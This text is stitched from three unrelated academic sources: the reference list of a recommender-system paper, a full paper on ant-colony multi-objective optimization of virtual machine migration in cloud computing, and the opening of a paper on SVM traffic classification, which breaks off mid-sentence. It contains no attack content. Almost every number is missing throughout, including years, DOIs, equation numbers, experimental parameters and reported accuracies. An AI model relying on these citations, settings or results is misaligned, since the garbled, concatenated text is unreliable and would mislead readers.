grant disclosures the following grant information was disclosed by the authors: the asian office of airforce research and development (aoard) through a project on deep recurrent q learning for recommendation system. competing interests the authors declare there are no competing interests. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • ismail ahmed al-qasem al-hadi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, developed the solutions proposed, and approved the final draft. • nurfadhlina mohd sharef conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, supervised and lead the project, and approved the final draft. • md nasir sulaiman and norwati mustapha conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • mehrbakhsh nilashi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: codes are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdelwahab a, sekiya h, matsuba i, horiuchi y, kuroiwa s. . feature optimiza- tion approach for improving the collaborative filtering performance using particle swarm optimization. journal of computational information systems ( ): – . al-badarneh amer , ali mostafa smg. . an improved classifier for arabic text. journal of convergence information technology : – . al-hadi iaa-q, hashim szm, shamsuddin smh. . bacterial foraging optimiza- tion algorithm for neural network learning enhancement. in: th international conference on hybrid intelligent systems (his). piscataway: ieee, – . al-hadi iaa-q, sharef nm, nasir sm, norwati m. a. temporal based factorization approach for solving drift and decay in sparse scoring matrix. in: international conference on soft computing and data mining. cham: springer, – . al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. . ensemble divide and conquer approach to solve the rating scores’ deviation in recommendation system. journal of computational science ( ): – doi . /jcssp. . . . al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. a. bacterial foraging opti- mization algorithm with temporal features to solve data sparsity in recommendation system. in: proceedings of the second international conference on internet of things, data and cloud computing. – . al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. b. review of the temporal recommendation system with matrix factorization. international journal of innova- tive computing, information and control ( ): – . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jcssp. . . http://dx.doi.org/ . /peerj-cs. al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n. b. temporal-based approach to solve item decay problem in recommendation system. advanced science letters ( ): – doi . /asl. . . alhijawi b, kilani y. . 
a collaborative filtering recommender system us- ing genetic algorithm. information processing & management ( ): doi . /j.ipm. . . bell rm, koren y. . lessons from the netflix prize challenge. association for com- puting machinery sigkdd explorations newsletter ( ): – doi . / . . chu pm, mao y-s, lee s-j, hou c-l. . leveraging user comments for recommenda- tion in e-commerce. applied sciences ( ): – doi . /app . han h, huang m, zhang y, bhatti ua. . an extended-tag-induced matrix factorization technique for recommender systems. information ( ): doi . /info . idrissi n, zellou a. . a systematic literature review of sparsity issues in recom- mender systems. social network analysis and mining ( ): doi . /s - - - . jonnalagedda n, gauch s, labille k, alfarhood s. . incorporating popularity in a personalized news recommender system. peerj computer science :e doi . /peerj-cs. . kim d-h, abraham a. . a hybrid genetic algorithm and bacterial foraging ap- proach for global optimization and robust tuning of pid controller with disturbance rejection. in: hybrid evolutionary algorithms. berlin, heidelberg: springer, – . koenigstein n, dror g, koren y. . yahoo! music recommendations: modeling music ratings with temporal dynamics and item taxonomy. in: proceedings of the fifth acm conference on recommender systems. new york: acm, – . koren y. . factorization meets the neighborhood: a multifaceted collaborative filtering model. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . koren y. . collaborative filtering with temporal dynamics. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . li f, xu g, cao l. . two-level matrix factorization for recommender systems. neural computing and applications ( ): – doi . /s - - - . li g, chi m. . expert cf: solving data matrix sparsity and computation complexity problems. transactions on machine learning and artificial intelligence ( ): – . lin j, li y, lian j. . a novel recommendation system via l -regularized convex optimization. neural computing and applications ( ): – doi . /s - - -w. mirbakhsh n, ling cx. . clustering-based factorized collaborative filtering. in: proceedings of the th acm conference on recommender systems. new york: acm, – . nguyen l, do m-pt. . a novel collaborative filtering algorithm by bit mining frequent itemsets. peerj preprints :e v . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asl. . http://dx.doi.org/ . /j.ipm. . http://dx.doi.org/ . / . http://dx.doi.org/ . /app http://dx.doi.org/ . /info http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /peerj-cs. nilashi m, ahani a, esfahani md, yadegaridehkordi e, samad s, ibrahim o, sharef nm, akbari e. . preference learning for eco-friendly hotels recommendation: a multi-criteria collaborative filtering approach. journal of cleaner production : – doi . /j.jclepro. . . . nilashi m, bin ibrahim o, ithnin n. . hybrid recommendation approaches for multi-criteria collaborative filtering. expert systems with applications ( ): – doi . /j.eswa. . . . nilashi m, jannach d, bin ibrahim o, ithnin n. . clustering-and regression-based multi-criteria collaborative filtering with incremental updates. information sciences : – doi . /j.ins. . . . rabiu i, salim n, da’u a, osman a. . 
recommender system based on temporal models: a systematic review. applied sciences ( ): doi . /app . sardianos c, ballas papadatos g, varlamis i. . optimizing parallel collaborative fil- tering approaches for improving recommendation systems performance. information ( ): doi . /info . vo nd, hong m, jung jj. . implicit stochastic gradient descent method for cross- domain recommendation system. sensors ( ): doi . /s . wang j, han p, miao y, zhang f. . a collaborative filtering algorithm based on svd and trust factor. in: international conference on computer, network, communication and information systems (cnci ). atlantis press,. wu x, yuan x, duan c, wu j. . a novel collaborative filtering algorithm of machine learning by integrating restricted boltzmann machine and trust information. neural computing and applications ( ): – doi . /s - - -y. yang d, chen t, zhang w, yu y. . collaborative filtering with short term pref- erences mining. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . ye f, eskenazi j. . feature-based matrix factorization via long-and short-term interaction. in: knowledge engineering and management. springer, berlin: springer, – . yuan y, zahir a, yang j. . modeling implicit trust in matrix factorization-based collaborative filtering. applied sciences ( ): doi . /app . zainal n, al-hadi iaa-q, ghaleb sm, hussain h, ismail w, aldailamy ay. . predicting mira patients’ performance using virtual rehabilitation programme by decision tree modelling. in: recent advances in intelligent systems and smart applications. cham: springer, – . zhang f, qi s, liu q, mao m, zeng a. a. alleviating the data sparsity problem of recommender systems by clustering nodes in bipartite networks. expert systems with applications ( ): – . zhang l, wei q, zhang l, wang b, ho w-h. b. diversity balancing for two- stage collaborative filtering in recommender systems. applied sciences ( ): doi . /app . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jclepro. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /app http://dx.doi.org/ . /info http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /app http://dx.doi.org/ . /app http://dx.doi.org/ . /peerj-cs. international journal of advanced network monitoring and controls volume , no. , multi objective optimization of virtual machine migration placement based on cloud computing sun hong , , tang qing ,xu liping and chen shiping university of shanghai for science and technology, shanghai china , shanghai key laboratory of modern optical systems, shanghai china corresponding author: sun hong, university of shanghai for science and technology, , shanghai, china email:sunhong@usst.edu.cn abstract. how to improve the resource utilization of the cloud computing system has been one of the key content of the research of the cloud computing. the traditional multi-objective ant colony optimization was improved, studied the virtual machine live migration framework, combined with the elimination method to solve virtual machine migration and placement of multi-objective optimization problem, the load balanced specific strategies are integrated into the framework of a dynamic migration, simulation experiments are carried out and the conclusions are made for it. the algorithm can obtain the optimal solution through the continuous updating of pheromone. 
the main consideration is the service level contract violation rate(s), resource loss(w),power consumption (p). experimental results show that ,compared with the traditional heuristic method and genetic algorithm, the algorithm is advantageous to the parallel computation, and it’s able to achieve the optimal tradeoff and compromise between multiple conflicting objectives. in the case of service level contract violation rate is low, system resource waste and power consumption are at the least, so it has feasibility. keywords: cloud computing, virtual machine migration, multi objective optimization, ant colony algorithm, elimination method. . introductiong as a new technology, cloud computing has become a hot research topic in the field of information in recent years. as a new business computing model, business characteristics and virtualization technology is its obvious characteristics. and the task scheduling is the key technology of cloud computing, it not only affects the efficiency of the whole system, but also significantly affects the quality of service. at present, the problem of task scheduling is studied in the grid environment. due to the diversity of user requirements in the cloud computing system, and the complexity of the task type, previous task scheduling algorithms can’t meet the requirements of the overall qos. in the dynamic cloud computing environment, improving the efficiency of task scheduling and load balancing is an eternal problem, for users, to meet the user’s qos requirements is the most important thing. therefore, the research on the task scheduling algorithm with qos expectation constraint is the key content of the multi objective optimization of virtual machine migration placement based on cloud computing cloud computing system. nowadays, cloud computing has become a new model to provide access and services through the internet. if the distribution of resources is not reasonable, it will inevitably lead to waste of resources. it is of great significance to realize the multi objective optimization of virtual machine migration and placement in the present stage. most researchers use the traditional heuristic method or genetic algorithm and other algorithms to make the virtual machine placement before; although these algorithms can solve the problem of virtual machine migration in a certain extent, but these algorithms have their own limitations. for example, heuristic method can solve the problem of local optimal solution in virtual machine migration, but the method is short of the ability of global optimization. although genetic algorithm has certain advantages in multi objective optimization, it can’t make full use of the feedback information, so that the search is blind, and the efficiency of solving the optimal solution to a certain extent is relatively low. ant colony optimization, which also called ant algorithm, is a kind of probabilistic algorithm used to find the optimal path in the graph. ant colony optimization is a simulated evolutionary algorithm, a preliminary study shows that the algorithm has many excellent performance. compared with the results of genetic algorithm design, numerical simulation results show that ant colony algorithm has a new simulation evolutionary optimization method and its effectiveness and application value. 
this paper introduces the management framework of the two layers of local management and global management, through this management framework is conducive to the migration of virtual machine placement and resource allocation to make better decisions. the method used in this paper is to improve the traditional ant colony algorithm, and combine with the exclusion method. it is advantageous to the parallel computation, and the efficiency is higher. to be able to obtain the optimal tradeoff between the three conflicting objectives which are service level contract violation rate(s),resource loss(w) and power consumption(p),and in the case of service level contract violation rate is low, the waste of system resources and power consumption are the least. . overall framework for virtual machine migration . virtual machine migration xen virtual machine is using virtualization technology which is a quasi virtualization technology, and have good performances in all kinds of architecture, it has very good performance and system isolation. up to now, xen is definitely the most outstanding linux system under the open source virtual machine, xen is now no longer originally just supported by x , and now has wild support and even itanium and other hardware platforms are available to it. version was released in , the client can support up to virtual cpu. to use a virtual machine, you should start the operating system, but microsoft platform vmware is the first to enable the physical machine system and then start the process, and this is not the standard. after xen started, the first step is to run the virtual machine monitor, which is xen hypervisor (also known as the super management program in the xen system), then run the host operating system (or local operating system),by minimizing the connection between the super manager and the native operating system, it reduces the risk of super management program itself and the virtual machine being destroyed and information leakage. . overall framework and optimization of virtual machine migration the basic migration structure is implemented by four modules, including migration monitoring, execution migration, suspension and rewake. as shown in figure . international journal of advanced network monitoring and controls volume , no. , monitor migration module: the primary function of the primary module is to determine the source of the migration, the start time of the migration, and the purpose of the migration. the working mode of listening and migrating module is determined by the purpose of migration. in order to ensure the load balance of each node, setting up the monitor signal in the virtual machine management program, according to the monitoring of the various nodes of the load operation to determine whether the need to migrate. set a migration threshold, when monitor to arrive at this value, monitor migration module will send a migration signal to the source, indicates that the source machine will be migrated. meanwhile, monitor the migration module to communicate with other nodes, look for the lower load nodes, and determine the specific location of the destination machine. run migration module: this module is the most important module of virtual machine migration, almost bear most of the migration work. after running the migration, this module collects the running information of the source machine, at the same time to freeze the module by sending the “frozen” signal to the source machine. 
this process is the key part of the migration process, directly affect the migration process downtime and migration of the total length. freezing module: this module is mainly responsible for how to solve the continuous service problem. it makes users feel not interruptions. target domain wake-up module: the function of the target domain wake-up module is to determine the time to wake up the destination machine, also ensure that the weaken target machine is consistent of the source machine, and how to ensure that the service of the target area is connected with the source area. after it shutdown, the running module will copy the remaining memory pages, then send the “weaken signal” to the weaken module which on the target machine. interrupt connection device is a direct consequence caused by shutdown, peripheral device cannot connect to virtual machine, this, of course, will cause the external service is not timely or appear all kinds of transmission errors. in order to improve the effectiveness of migration, reduce the time of shutdown, increase the application rate of load, we propose an optimized virtual machine dynamic migration framework, this framework is also based on xen. figure. the virtual machine dynamic migration placement module multi objective optimization of virtual machine migration placement based on cloud computing in order to improve the utilization of load, at the same time, it also makes the migration process more smooth and effective, optimization the design of dynamic migration of xen virtual machine. add two modules to achieve load balancing, one of them is the load monitor module, which add to the original monitor migration module, in order to set the identity of the current virtual machine running information, set the trigger conditions for its migration and prepare for the subsequent migration to select the appropriate load; the other one load transfer module is mainly responsible for the positioning and selection strategy of the virtual machine migration. as shown in figure , three modules are marked by grey patterns. figure. dynamic migration of virtual machine placement framework optimization module . virtual machine migration placement policy model a large number of computers will be integrated into resource pool in the cloud computing, then the computing tasks in cloud computing are distributed in the resource pool, all applications can each one takes what he needs, for example, you can have a stronger computing power to meet the needs of computing, you can set aside a larger storage space to store resources, and even more perfect online updates and other software services. in the cloud computing platform, a variety of servers to complete a specific task by way of collaboration. because there is no unified standard for cloud computing platform application interface, the application of the various cloud environments can not be fully integrated, at the same time, the resources of the nodes in the cloud environment are different. for example, the formats provided by the same resource are different, the demands for resources in different time periods are different, there are large number of access to the same node during certain periods of time. this will lead a overload caused by excessive access on a server node in a certain period of time. while the other nodes are less load due to access relatively light, this forms the node utilization rate is not high in the whole system, causing the load is not balanced. 
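as a concrete illustration of the decisions the load monitor and load transfer modules described above could take, the sketch below uses a threshold-and-window trigger and a least-loaded destination choice; the names and numbers are assumptions, not the framework's actual interface.

```python
def should_migrate(load_samples, threshold=0.85, window=3):
    """Load-monitor decision: trigger a migration when the node's monitored load has
    stayed above the threshold for `window` consecutive samples (values illustrative)."""
    recent = load_samples[-window:]
    return len(recent) == window and all(load > threshold for load in recent)

def pick_destination(node_loads):
    """Load-transfer decision: choose the least-loaded node as the migration destination."""
    return min(node_loads, key=node_loads.get)

print(should_migrate([0.70, 0.90, 0.92, 0.88]))             # True
print(pick_destination({"node-a": 0.91, "node-b": 0.35}))   # node-b
```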
virtualization technology continues to mature, this is to provide a solution to this. the emergence of dynamic migration of virtual machine is an effective way to solve the load imbalance. the whole virtual machine running state can smooth and stable mutual transfer between the two physical hosts in the same cluster, of course, this is the necessary conditions for the transfers, and users don’t have any feeling of stagnation. the dynamic migration of virtual machine can assist the maintenance personnel of the cloud environment, so that the nodes in the cluster can be fully used, achieve load balancing dynamically. therefore, to improve the resource allocation in the cloud environment and to strengthen the system by designing an efficient load balancing algorithm, international journal of advanced network monitoring and controls volume , no. , this has become one of the important issues in the field of cloud computing. virtual machines allow all computing tasks to encapsulate into the virtual machine. because the virtual machine is one of the characteristics of isolation, so you can use the virtual machine dynamic migration technology to migrate computing tasks. the scale of cloud computing is generally relatively large, it also provide the same size of the pressure to how to adjust the distribution of the node resources. considering the real time information of resources in cloud environment, resource scheduling must be done, this requires real- time monitoring of resources in the cloud environment, and can dynamically manage. from the point of view of the process size of the task to be migrated, cloud computing users pay more attention to the migration process in the virtual machine itself how to operate, of course, the premise is to try not to affect the user. how to provide resources to the service level agreement of the internal application of the virtual machine is a problem to be solved at present. in terms of practical ability, resource scheduling system must monitor the usage of resources and provide reference for the system itself in time, or for system management related personnel to set. . virtual machine management framework the number of infrastructure nodes in cloud computing is very large, which makes it very difficult to build a structure. the management framework of this paper is two layers of management, local management and global management, the details are shown in figure .the management of host cloud infrastructure to enable global management to run on a host node, by monitoring the collection of various information from local management, including user service quality resource consumption and power consumption, and so on, then make decisions on the placement of the virtual machine and the allocation of resources. figure. virtual machine system management structure . mathematical model of virtual machine migration the migration and placement of virtual machine has been the focus of research in cloud computing, it is a typical bin packing problem. the literature proves that the virtual machine migration is a np-hard problem. according to the framework of system management in figure , in this paper, we need to consider the following factors in the global management of virtual machine initialization: service level contract violation rate(s), resource loss(r), power consumption(p). 
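as an illustration of the information flow in this two-layer framework, the toy sketch below has each local manager report exactly these factors and the global manager derive a simple source/destination decision from them; the field names, threshold and rule are illustrative assumptions, not the framework's actual interface.

```python
from dataclasses import dataclass

@dataclass
class NodeReport:
    """What a local manager could report to the global manager each period."""
    node_id: str
    sla_violation_rate: float
    resource_waste: float
    power_watts: float

def global_decision(reports, sla_limit=0.05):
    """Toy global-management rule: nodes whose SLA violation rate exceeds the limit
    become migration sources; the remaining nodes are ranked as candidate
    destinations by how little power they currently draw."""
    sources = [r.node_id for r in reports if r.sla_violation_rate > sla_limit]
    destinations = sorted(
        (r for r in reports if r.sla_violation_rate <= sla_limit),
        key=lambda r: r.power_watts,
    )
    return sources, [r.node_id for r in destinations]

reports = [
    NodeReport("node-a", 0.08, 0.30, 410.0),
    NodeReport("node-b", 0.01, 0.25, 250.0),
    NodeReport("node-c", 0.02, 0.40, 380.0),
]
print(global_decision(reports))   # (['node-a'], ['node-b', 'node-c'])
```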
m and n indicate the number of physical nodes and virtual machines, respectively; $c_j$ denotes the resource capacity of the j-th physical node and $r_i$ denotes the resource capacity requested by the i-th virtual machine. its mathematical model is described as follows:

target: ( )

constraints:

$\sum_{i=1}^{n} r_i^{cpu}\cdot a_{ij} < c_j^{cpu},\quad j\in[1,\dots,m]$ ( )

$\sum_{i=1}^{n} r_i^{mem}\cdot a_{ij} < c_j^{mem},\quad j\in[1,\dots,m]$ ( )

$\sum_{i=1}^{n} r_i^{bw}\cdot a_{ij} < c_j^{bw},\quad j\in[1,\dots,m]$ ( )

$\sum_{j=1}^{m} a_{ij} = 1,\quad i\in[1,\dots,n]$ ( )

the three objectives of formula ( ) are the service level contract violation rate (s), resource loss (r), and power consumption (p). formulas ( - ) constrain the allocation of cpu, memory and network bandwidth resources on each physical node so that it does not exceed the node's own capacity, and formula ( ) constrains each virtual machine to be assigned to exactly one physical node.

multi objective optimization virtual machine migration placement strategy based on ant colony algorithm

the ant colony algorithm is a technique that can be used to find the optimal solution. the algorithm is widely used for the virtual machine migration and placement problem and has certain advantages in dealing with combinatorial optimization problems. the specific design steps and process of this article are as follows.

fitness function

the selection of the fitness function is very important. according to formula ( ), three sub-suitability functions are defined whose values lie in the range [ ]: the sla violation rate function ($f_{sla}$), the resource utilization function ($f_{resource}$) and the power consumption function ($f_{power}$), as given in formulas ( ) - ( ).

$f_{sla}(u_{cpu}) = \dfrac{1}{1 + e^{-u_{cpu}}}$ ( )

$f_{resource}(u_{cpu}, u_{mem}, u_{bw}) = u_{cpu}\times u_{mem}\times u_{bw}$ ( )

$f_{power}(u_{cpu}) = \dfrac{u_{cpu}\times p_{busy}}{p_{idle} + (p_{busy} - p_{idle})\times u_{cpu}}$ ( )

in the formulas, $u_{cpu}$, $u_{mem}$ and $u_{bw}$ denote the cpu, memory and network bandwidth utilization of the physical node, while $p_{busy}$ and $p_{idle}$ denote its power consumption when fully loaded and when idle. $f_{power}$ reflects the amount of effective work obtained for a certain amount of power consumed. taking into account the need to balance the service level contract violation rate (s), resource loss (r) and power consumption (p) goals, the weight values in this paper are set to , and according to experience the suitability function is defined as

$f(u_{cpu}, u_{mem}, u_{bw}) = f_{sla}(u_{cpu}) + f_{resource}(u_{cpu}, u_{mem}, u_{bw}) + f_{power}(u_{cpu})$ ( )

pheromone

the pheromone update rules are shown in formulas ( ) - ( ):

$\gamma_{iu} = (1-\rho)\times\gamma_{iu} + \Delta\gamma_{iu}^{best}$ ( )

$\Delta\gamma_{iu}^{best} = \begin{cases} f(s^{best}), & \text{if } vm_i \text{ is loaded on node } u \\ 0, & \text{otherwise} \end{cases}$ ( )

in the formulas, $s^{best}$ is the optimal solution set, $\rho$ is the pheromone volatility coefficient, $\Delta\gamma_{iu}^{best}$ is the pheromone increment, and $f(s^{best})$ is the suitability (fitness) function value.

probability transfer function

$p_{iu}^{k}(t) = \dfrac{[\gamma_{iu}(t)]^{\alpha}\times[\eta_{iu}(t)]^{\beta}}{\sum_{s\in allowed_k}[\gamma_{is}(t)]^{\alpha}\times[\eta_{is}(t)]^{\beta}},\quad u\in allowed_k$ ( )

in the formula, $\alpha$ is the information heuristic factor and $\beta$ is the visibility heuristic factor. among them, $\gamma_i^{cpu}$, $\gamma_i^{mem}$ and $\gamma_i^{bw}$ are the ratios of the cpu, memory and network bandwidth requested by virtual machine i to the corresponding resources on the host node u.
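a minimal sketch of the constraint check and the three suitability terms defined above follows; the power figures, the equal weights and the exact functional forms are illustrative assumptions rather than values taken from the paper.

```python
import math
import numpy as np

P_BUSY, P_IDLE = 250.0, 160.0   # illustrative full-load / idle node power (watts)

def placement_is_feasible(assign, demand, capacity):
    """Constraints of the model above: each VM on exactly one node, and the summed
    cpu/mem/bw demand on every node strictly below that node's capacity.
    assign: (n_vms, n_nodes) 0/1 matrix a_ij; demand: (n_vms, 3); capacity: (n_nodes, 3)."""
    one_node_per_vm = np.all(assign.sum(axis=1) == 1)
    per_node_load = assign.T @ demand
    return bool(one_node_per_vm and np.all(per_node_load < capacity))

def f_sla(u_cpu):
    """SLA term: logistic in the CPU utilization."""
    return 1.0 / (1.0 + math.exp(-u_cpu))

def f_resource(u_cpu, u_mem, u_bw):
    """Resource-utilization term: product of the three utilizations."""
    return u_cpu * u_mem * u_bw

def f_power(u_cpu):
    """Power term: useful work relative to the linear power model
    P(u) = p_idle + (p_busy - p_idle) * u."""
    return (u_cpu * P_BUSY) / (P_IDLE + (P_BUSY - P_IDLE) * u_cpu)

def node_fitness(u_cpu, u_mem, u_bw):
    """Combined suitability of one candidate node (equal weights assumed)."""
    return f_sla(u_cpu) + f_resource(u_cpu, u_mem, u_bw) + f_power(u_cpu)

print(round(node_fitness(0.6, 0.5, 0.4), 3))
```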
the construction of the optimal solution set using the exclusion method to construct the non dominated set is a common method in multi-objective genetic algorithm. in this paper, we use the rule of law and its appropriate improvements to deal with the solution of the ant colony algorithm search process, which can be used to build the paxeto solution set, the process is as follows: step :set the solution set { } , ,cycle nd d d d∗ =  for a loop search, where n is the number of the solution to the search. step :to evaluate each solution vector has sub goals, if id target is better than jd corresponding to other sub goals and sub goals, id and jd were compared to non inferior, concludes that id dominated jd , jd must be removed from the current set of solutions of c, and vice versa. step :and so on, will the solution cycled∗ were compared with each other, to get the optimal solution set cycled ∗ of cycles. multi objective optimization of virtual machine migration placement based on cloud computing step :the cycled∗ and the global optimal solution set bestd are compared according to the exclusion method, and the final non dominated solution is saved to the bests . step :to continue the cycle, when the cycle is over, the global optimal solution set bestd is the pareto optimal solution set. . experimental results and analysis this experiment is done on the c oudsim[ ], cloudsim by rajkumar professor buyya team (melbourne university) developed cloud computing simulator, melbourne university in australia grid laboratory and gridbus project announced the launch of cloud computing simulation software. cloudsim as a generic, scalable new simulation framework that supports seamless modeling and simulation, and can be carried out on the basis of cloud computing infrastructure and management services. this simulation framework has the following characteristics[ ]: simulation and example of a large-scale cloud infrastructure supporting a single physical computing node. to provide an independent platform, the main function is to the modeling of the data center, service agent and scheduling strategy. in a data center node to provide a virtual engine, to manage the independent virtualization services. flexible virtualization services can switch between shared space and shared time processing core allocation policies. in this paper, we use ant colony algorithm for resource allocation, and some other algorithms are compared. experiment set physical nodes, each node is configured for gb l memory, tb storage and bandwidth of gbps, while the capacity of cpu is equivalent to , and mips. the number of requests for a virtual machine is , where the request for cpu is and mips, gb memory, , gb bandwidth, mbps. the power consumption of the physical node in cpu utilization is % and %, respectively. the power consumption is w and w. figure. comparison of sla violation rate and resource waste in placement algorithms international journal of advanced network monitoring and controls volume , no. , figure. comparison of the fitness function value of kinds of placement algorithms figure. comparison of placement algorithms under power consumption . concluding remarks the algorithm used in this paper is an improved ant colony algorithm for distributed multi objective optimization. this algorithm is an improvement of the traditional multi objective ant colony algorithm. selected service level contract violation rate (s), resource consumption (w), power consumption (p) three targets. 
and combined with the elimination method to solve the virtual machine migration in the placement of these three objectives optimization problem. experimental results show that compared with the traditional heuristic method and genetic algorithm, the proposed algorithm can effectively reduce the resource waste and the power consumption of the system when the service level contract violation rate is low, and it has feasibility. this paper has used the power consumption as one of the management objectives, next, we also need to consider how to take into account the data center network traffic and other aspects, so as to achieve more perfect. references [ ] hyear c,mckee b, gardner r, et al. autonomic virtual machine placement in the data center [j]. hewlett packard laboratories, tech. rep. hpl- - , : - . [ ] li jingchao,chenjingyi,wujie. research on virtual machine placement based on improved grouping genetic algorithm [j]. computer engineering and design, , ( ): - .. [ ] li yong: analysis and research on dynamic migration of virtual machine[dissertation]. national defense multi objective optimization of virtual machine migration placement based on cloud computing science and technology university, . [ ] li zhiwei,wuqingbo,tanyusong. research on dynamic migration of virtual machine based on device agent mechanism. computer application research. twenty-sixth volumes, april . [ ] carey m r,johnson d s. computers and ln tractability: a guide to np-completeness [j]. . [ ] calheiros r n, ranjan r, ct al. cloud sim: a toolkit for modeling and simulation of cloud computing environments and evaluation of resource provisioning algorithms [j]. software: practice and experience, , ( ): - . [ ] sun hong, zhang huaxuan, chen shiping, etal. the study of improved fp-growth algorithm in map reduce[c].//proc.cpci- st international workshop on cloud computing and information security(ccis) cpci: acknowledgements this work was supported by the national natural science foundation of china (no. , no. ), innovation program of shanghai municipal education commission(no. zz ), and the hujiang foundation(c ). biographies sun hong: female, han, -, from beijing, china, master, associate professor, school of optical- electrical and computer engineering university of shanghai for science and technology, master tutor, associate professor direction of research; business schools university of shanghai for science and technology doctor graduate student; the main research direction: computer network communication and clouds computing, management science and engineering, management information and decision support system . email:sunhong@usst.edu.cn,telephone: tang qing: male, han, -, master student, school of optical-electrical and computer engineering university of shanghai for science and technology; the main research direction: cloud computing and management information system.email:qingtang @ .com xu li-ping: female, han, -, master, associate professor, university of shanghai for science and technology; the main research direction: cloud computing and management information system. email: @qq.com chen shi-ping: male, han, -,form zhejiang, china, professor, ph.d., doctoral tutor business schools university of shanghai for science and technology, research direction: computer network communication and clouds computing, management science and engineering. email:chensp@usst.edu.cn international journal of advanced network, monitoring and controls volume , no. , doi: . 
/ijanmc- - a new method of improving the traditional traffic identification and accuracy wang zhongsheng school of computer science and engineering xi'an technological university xi'an, , shaanxi, china e-mail: wzhsh @ .com gao jiaqiong department of computerscience sichuanvocational andtechnicalcollege suining, , sichuan, china e-mail: @qq.com abstract—as the traffic generated by the increasing number of applications on the internet is becoming more and more complex, how to improve the quality of service and security of the network is also increasingly important. this paper studies the application of support vector machine (svm) in traffic identification to classify network traffic. through data collection and feature generation methods and network traffic feature screening methods, svm is used as a classifier by using the generalization capability, and the parameters and the kernel functions of svm are adjusted and selected based on cross comparison ideas and methods. using the cross-validation method to make the most reasonable statistics for the classification and recognition accuracy of the adjusted support vector machine avoids the situation that the classification accuracy of the support vector machine is unstable or the statistics are inaccurate. finally, a traffic classification and identification system based on svm is implemented. the final recognition rate of encrypted traffic is up to . %, which overcomes the disadvantages of traditional traffic identification and achieves a fairly reliable accuracy. keywords-support vector machine (svm); traffic classification; feature extraction; kernel function i. introduction due to the rapid development of the internet, internet business has greatly facilitated and enriched people's lives, learning and work, and has attracted more and more users. with the new application patterns (such as p p) and application demand emerging in the internet[ ], the pressure of huge data transmission is becoming more and more heavy, and the occurrence of network failures is becoming more and more frequent, which leads to a series of network failures, such as packet loss, network congestion, and time delay in the process of data transmission. the maneuverability of the network is greatly reduced, the normal operation of the network is affected, and huge economic losses are incurred. therefore, how to identify and classify the network traffic in real time helps the internet service provider to understand the network operation status and optimize the network operation and management. it is of great significance. the current popular network traffic identification technologies include traffic identification algorithms based on known ports [ ]; traffic identification based on deep packet (dpi) [ - ]; traffic identification algorithms based on data flow behavior pattern [ ]; traffic identification algorithms based on machine learning and so on. the traffic classification method [ ] has been widely proposed in the past few years. initially, the type of data transmitted over the internet is relatively small. the traffic identification technology is mainly based on port identification. that is, the general network protocol port number [ ] is used to roughly classify traffic. for example, the protocol uses a fixed port. however, with the development of the internet, merely relying on port identification technology has been insufficient to distinguish between more and more network applications and protocols. 
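for concreteness, such a port-based classifier is little more than a lookup against registered port numbers, as the sketch below shows; the mapping lists a few well-known ports only and is an illustration, not an exhaustive registry.

```python
# Illustrative well-known port mappings; real deployments use the full IANA registry.
WELL_KNOWN_PORTS = {
    20: "ftp-data", 21: "ftp", 22: "ssh", 25: "smtp",
    53: "dns", 80: "http", 110: "pop3", 443: "https",
}

def classify_by_port(dst_port):
    """Port-based identification: map the destination port to an application,
    falling back to 'unknown' for unregistered or dynamically negotiated ports."""
    return WELL_KNOWN_PORTS.get(dst_port, "unknown")

print(classify_by_port(443))    # https
print(classify_by_port(6881))   # unknown (e.g. a peer-to-peer client on a dynamic port)
```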
in , an application layer load signature recognition method, the dpi technology [ ], was proposed to extract the data message samples and determine whether the traffic belongs to the application by matching the signature of the unknown traffic. in recent years, the proportion of network traffic transmitted by encrypted text is increasing. dpi international journal of advanced network, monitoring and controls volume , no. , technology has been powerless for this part of the traffic. at present, the method of network traffic recognition based on machine learning [ ] shows a higher accuracy. machine learning is an important tool for the study of network traffic identification. dong s and others described the current popular machine learning method [ ]. after comparing and evaluating the clustering algorithm [ ], it was found that the feature selection algorithm [ ] was better for supervised machine learning[ , ]. dbscan algorithm [ ] of unsupervised clustering algorithm has higher precision. since the development of a complete classification architecture [ ] for real-time work on high-capacity links is limited, este a[ ] and others after demonstrating the computational time and the optimization steps required to handle different traffic traces, used machine learning techniques(svm model[ ]) to improve system performance and enable real-time traffic identification for high-speed networks. zhao x proposed a p p network traffic classification method based on support vector machine [ ], using a statistical principle to divide the network traffic of four different types of p p traffic applications (file sharing bittorrent, media streaming pplive, internet phone skype, instant messaging msn), and studied network traffic statistics and svm methods. the overall framework of p p traffic classification based on svm was introduced, how to obtain traffic samples and processing methods were described, and the traffic classifier was constructed, with an average accuracy of . %. bernaille l and others divided the traffic classification mechanism into two phases [ ]: offline learning and online classification. the offline learning stage uses the kmeans method [ , , ] to divide the original traffic and give a description of each cluster and its application type; the online learning stage determines the application type of the new traffic 